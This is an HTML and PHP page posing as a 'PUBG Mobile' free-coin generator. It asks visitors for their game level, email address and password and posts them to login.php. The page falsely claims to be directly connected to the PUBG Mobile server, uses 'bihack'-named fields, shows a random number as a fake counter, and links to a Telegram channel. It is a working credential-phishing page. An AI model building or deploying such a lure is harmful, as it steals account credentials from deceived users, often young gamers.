<!doctype html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>BUBG MOBILE</title>
    <link rel="stylesheet" href="css/bihack.css" type="text/css">
</head>
<body style="background:#000000">
<center>
<br><br><br><br><br>

</center>

<div class="register">
<img src="img/pubgmobile.jpg" alt="" width="400">
<br>
<form method="POST" id="login-form" class="adjacent" action="login.php">
    <input type="text" class="seyed2" name="bihacklevel" placeholder="Level value"><br>
    <input type="email" class="seyed2" name="bihackemail" placeholder="email address"><br>
    <input type="password" class="seyed2"  name="bihackpass" placeholder="your password"><br>
   <br>
 
    <input type="submit" class="seyed" name="submit" value="Deposit">
</form>
<br>
    <a href="https://t.me/bi_hacke">BUBG MOBILE</a><br> <br>
      
	  <?php
   $r=rand(490,500);
   echo $r;
   ?>
</div>
<center>
<p>Dear user, this application is directly connected to PUBG Mobile main server. <br>
You can add 1000coin in PUBG MOBILE</p>

</center>
</body>
</html>

